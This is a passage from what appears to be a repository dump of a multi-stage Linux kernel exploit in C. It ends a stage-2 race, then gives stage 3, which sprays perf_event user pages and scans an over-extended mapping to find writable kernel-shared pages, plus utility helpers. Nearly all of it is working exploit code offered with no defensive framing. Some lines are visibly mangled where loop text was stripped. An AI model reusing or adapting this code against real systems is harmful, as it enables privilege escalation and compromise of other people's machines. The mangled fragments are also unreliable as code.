printf("[C] Won stage 2 race\n"); 113 | size_t correction = 0; 114 | //If we caught sigbus the last page we tried to access wasn't valid anymore 115 | if(exp_data->caught_sigbus) 116 | { 117 | printf("[C] Caught sigbus, correcting offset\n"); 118 | correction = PAGE_SIZE; 119 | } 120 | exp_data->mapped_start = mmap_aux_curr+correction; 121 | exp_data->mapped_end = mmap_aux_end+PAGE_SIZE; 122 | exp_data->race_done = 1; 123 | exp_data->success = 1; 124 | race_barrier_wait(&exp_data->result_barrier); 125 | return NULL; 126 | } 127 | } -------------------------------------------------------------------------------- /stage3.c: -------------------------------------------------------------------------------- 1 | #include "exploit.h" 2 | #include 3 | #include 4 | 5 | /* Stage 3 6 | * This exploit stage performs a spray to try and get writable user pages. 7 | * To do this pages of memory are continually allocated by mmaping new perf_events and mapping their user pages. 8 | * The user page is then filled with a pattern and read back through the additional pages in the vma from stage 2. 9 | * If the pattern is found the sprayed pages are filled with their spray indices and then read back again to verify 10 | * that the pattern wasn't by coincidence and to determine the page offsets. 11 | */ 12 | 13 | //Dumb wrapper to check if a page already found a corresponding other page 14 | int page_already_found(struct exp_sync_stage3 *exp_data, void* addr, int idx) 15 | { 16 | for(int i=0; iwritable_page_count; i++) 17 | { 18 | if(addr && addr==exp_data->writable_pages[i].writable_page) 19 | return 1; 20 | else if(idx>=0 && idx==exp_data->writable_pages[i].page_index) 21 | return 1; 22 | } 23 | return 0; 24 | } 25 | 26 | void stage3_parent() 27 | { 28 | struct exp_sync_stage3 *exp_data = &global_exp_data->stage3; 29 | struct perf_event_attr attrs = {0}; 30 | memset((char*)&attrs,0,sizeof(attrs)); 31 | attrs.size = sizeof(attrs); 32 | attrs.disabled = 1; 33 | attrs.exclude_kernel = 1; 34 | attrs.exclude_hv = 1; 35 | attrs.type = PERF_TYPE_SOFTWARE; 36 | attrs.config = PERF_COUNT_SW_DUMMY; 37 | printf("[P] Starting the spray\n"); 38 | struct spray_map_info *spray_infos = exp_data->spray_infos; 39 | while(!exp_data->finished) 40 | { 41 | race_barrier_wait(&exp_data->rdy_barrier); 42 | for(int i=0; ispray_barrier); 57 | while(exp_data->scanning) 58 | { 59 | if(exp_data->req_change) 60 | { 61 | exp_data->req_change = 0; 62 | for(int i=0; ichange_barrier); 71 | } 72 | } 73 | race_barrier_wait(&exp_data->check_barrier); 74 | for(int i=0; iresult_barrier); 85 | } 86 | } 87 | 88 | int is_page_same_value(char* page_start, char val) 89 | { 90 | char* end = page_start+PAGE_SIZE; 91 | for(char* vcurr = page_start; vcurrwritable_page_count == STAGE3_ABS_THRESHOLD) 102 | return 1; 103 | if(exp_data->num_iterations == STAGE3_MAX_ITERATIONS) 104 | return 1; 105 | if(exp_data->writable_page_count == exp_data->total_page_count) 106 | return 1; 107 | 108 | if(exp_data->num_iterations < STAGE3_MIN_ITERATIONS) 109 | return 0; 110 | //If we've found more than the fraction of remaining iterations we stop early 111 | //i.e. if writable_page_count/stage3_abs_threshold > 1-num_iterations/max_iterations 112 | //to work with integers do a slight modification 113 | //writable_page_count*max_iterations > (max_iterations-num_iterations)*stage3_abs_threshold 114 | int rem_iterations = STAGE3_MAX_ITERATIONS-exp_data->num_iterations; 115 | if(exp_data->writable_page_count*STAGE3_MAX_ITERATIONS >= rem_iterations*STAGE3_ABS_THRESHOLD) 116 | return 1; 117 | return 0; 118 | } 119 | 120 | void stage3_child() 121 | { 122 | struct exp_sync_stage3 *exp_data = &global_exp_data->stage3; 123 | exp_data->writable_page_count = 0; 124 | char* addr = (char*)exp_data->mapped_start; 125 | char* addr_end = (char*)exp_data->mapped_end; 126 | exp_data->total_page_count = (addr_end-addr)/PAGE_SIZE; 127 | printf("[C] Scanning %d pages, range %p-%p\n", exp_data->total_page_count, addr, addr_end); 128 | while(!exp_data->finished) 129 | { 130 | exp_data->num_iterations++; 131 | char* curr = addr; 132 | race_barrier_wait(&exp_data->rdy_barrier); 133 | 134 | exp_data->scanning = 1; 135 | race_barrier_wait(&exp_data->spray_barrier); 136 | //We only check the first char on the page, because if we find a change in another char we will never pass the check if the whole page is identical anyway 137 | for(;currreq_change = 1; 157 | race_barrier_wait(&exp_data->change_barrier); 158 | //We fill each page with its index and check if the whole page changed 159 | 160 | //Page was coincidentally as we were expecting, but didn't change later 161 | //Skip to next page 162 | 163 | char first_val = *curr_page; 164 | 165 | if(!is_page_same_value(curr_page, first_val)) 166 | continue; 167 | 168 | int idx = exp_data->writable_page_count; 169 | exp_data->writable_pages[idx].writable_page = curr_page; 170 | exp_data->writable_pages[idx].page_index = (int)first_val; 171 | exp_data->writable_page_count++; 172 | } 173 | } 174 | exp_data->scanning = 0; 175 | race_barrier_wait(&exp_data->check_barrier); 176 | if(finished_with_stage3(exp_data)) 177 | { 178 | printf("[C] Unmapping readable pages with writable counterpart\n"); 179 | for(int i=0; iwritable_page_count; i++) 180 | { 181 | void* curr_page = (void*)exp_data->writable_pages[i].writable_page; 182 | if(munmap(curr_page,PAGE_SIZE)<0) 183 | { 184 | perror("[C] munmap writable"); 185 | } 186 | } 187 | exp_data->finished = 1; 188 | } 189 | exp_data->scan_done = 1; 190 | exp_data->scanning = 0; 191 | race_barrier_wait(&exp_data->result_barrier); 192 | } 193 | } -------------------------------------------------------------------------------- /util.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include "util.h" 3 | #include 4 | #include 5 | 6 | void hexdump(char* data, size_t nBytes) 7 | { 8 | char dump_buf[140]; 9 | int idx=0,sidx = 0; 10 | printf("dump@%p\n",data); 11 | while(idx 4 | #include 5 | #define perror_exit(s) do{perror(s); exit(-1);}while(0); 6 | void hexdump(char* data, size_t nBytes); 7 | void assignToThisCore(int core_id); 8 | #endif --------------------------------------------------------------------------------